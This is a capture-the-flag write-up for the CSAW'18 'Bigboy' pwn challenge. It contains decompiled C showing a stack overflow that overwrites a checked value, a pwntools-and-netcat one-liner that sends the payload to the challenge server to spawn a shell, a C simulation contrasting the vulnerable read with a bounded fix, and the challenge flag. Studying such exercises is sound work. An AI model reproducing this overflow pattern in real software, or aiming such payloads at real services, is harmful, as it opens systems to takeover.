CSAW’18 CTF Qualification: Bigboy
Event | Challenge | Category | Points | Solves |
---|---|---|---|---|
CSAW’18 CTF Qualification | Bigboy | Pwn | 25 | 656 |
Description
Only big boi pwners will get this one!
nc pwn.chal.csaw.io 9000
You can download the ELF file here: boi
TL;DR
This challenge is a simple buffer overflow guarded by a check on a neighbouring stack variable; passing the check gives you a shell. It's an easy pwn, so a one-liner is the way to go!
Methodology
Step 1: Use IDA to decompile the program so you don't lose time, then overflow the buffer with the expected value repeated enough times to reach the `/bin/bash` branch.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 buf; // [rsp+10h] [rbp-30h]  8-byte destination of read()
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]  its high dword (rbp-1Ch) is the checked value
  int v7; // [rsp+28h] [rbp-18h]
  unsigned __int64 v8; // [rsp+38h] [rbp-8h]  stack canary, never reached

  v8 = __readfsqword(0x28u);
  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0;
  HIDWORD(v6) = -559038737;           // 0xDEADBEEF by default -> /bin/date
  puts("Are you a big boiiiii??");
  read(0, &buf, 0x18uLL);             // 24 bytes into an 8-byte buf: bytes 20..23 land on HIDWORD(v6)
  if ( HIDWORD(v6) == 0xCAF3BAEE )
    run_cmd("/bin/bash", &buf);
  else
    run_cmd("/bin/date", &buf);
  return 0;
}
```
Step 2: Send the payload, then print the command you want to run.

```bash
python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"' | nc pwn.chal.csaw.io 9000
```
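To make the layout concrete, here is an added example (not part of the writeup or the challenge binary) that models `main()`'s frame as a struct with the offsets from the IDA listing, feeds it the same 24-byte payload, and compares the original `read(0, &buf, 0x18)` with a read bounded by `sizeof(buf)`. The struct model, the `run_frame`/`vulnerable`/`fixed` names and the hand-built payload are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame model from the IDA listing: buf at rbp-0x30, v5 at rbp-0x28,
 * v6 at rbp-0x20, v7 at rbp-0x18. A struct gives these offsets
 * deterministically; a real stack frame depends on the compiler. */
struct frame {
    uint64_t buf;  /* offset 0x00: the 8-byte destination of read() */
    uint64_t v5;   /* offset 0x08 */
    uint64_t v6;   /* offset 0x10: high dword (0x14..0x17) holds the cookie */
    int32_t  v7;   /* offset 0x18 */
};
union frame_bytes { struct frame f; unsigned char raw[sizeof(struct frame)]; };

#define HIDWORD(x) ((uint32_t)((x) >> 32))

/* Simulates main(): copies at most read_len input bytes into buf and
 * returns 1 if the /bin/bash branch would be taken, 0 for /bin/date. */
static int run_frame(const unsigned char *in, size_t len, size_t read_len)
{
    union frame_bytes u;
    memset(&u, 0, sizeof u);
    u.f.v6 = (uint64_t)0xDEADBEEFu << 32;     /* HIDWORD(v6) = -559038737 */
    if (len > read_len) len = read_len;        /* read(0, &buf, read_len) */
    memcpy(u.raw, in, len);
    return HIDWORD(u.f.v6) == 0xCAF3BAEE;
}

/* Original: 0x18 = 24 bytes into an 8-byte buf, reaching v6. */
int vulnerable(const unsigned char *in, size_t len) { return run_frame(in, len, 0x18); }
/* Fix: bound the read by the buffer size so v6 stays untouched. */
int fixed(const unsigned char *in, size_t len) { return run_frame(in, len, sizeof(uint64_t)); }

/* Constructed payload equal to p32(0xCAF3BAEE) * 6: little-endian dword repeated. */
static void build_payload(unsigned char out[24])
{
    static const unsigned char dword[4] = { 0xEE, 0xBA, 0xF3, 0xCA };
    for (int i = 0; i < 6; i++) memcpy(out + 4 * i, dword, 4);
}

int payload_on_original(void) { unsigned char p[24]; build_payload(p); return vulnerable(p, sizeof p); }
int payload_on_fixed(void)    { unsigned char p[24]; build_payload(p); return fixed(p, sizeof p); }

int main(void)
{
    printf("original binary: %s\n", payload_on_original() ? "/bin/bash" : "/bin/date");
    printf("bounded read:    %s\n", payload_on_fixed() ? "/bin/bash" : "/bin/date");
    return 0;
}
```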
Step 3: Enjoy your free 25 points yayyyy! \o/
The flag is: flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}
-Laluka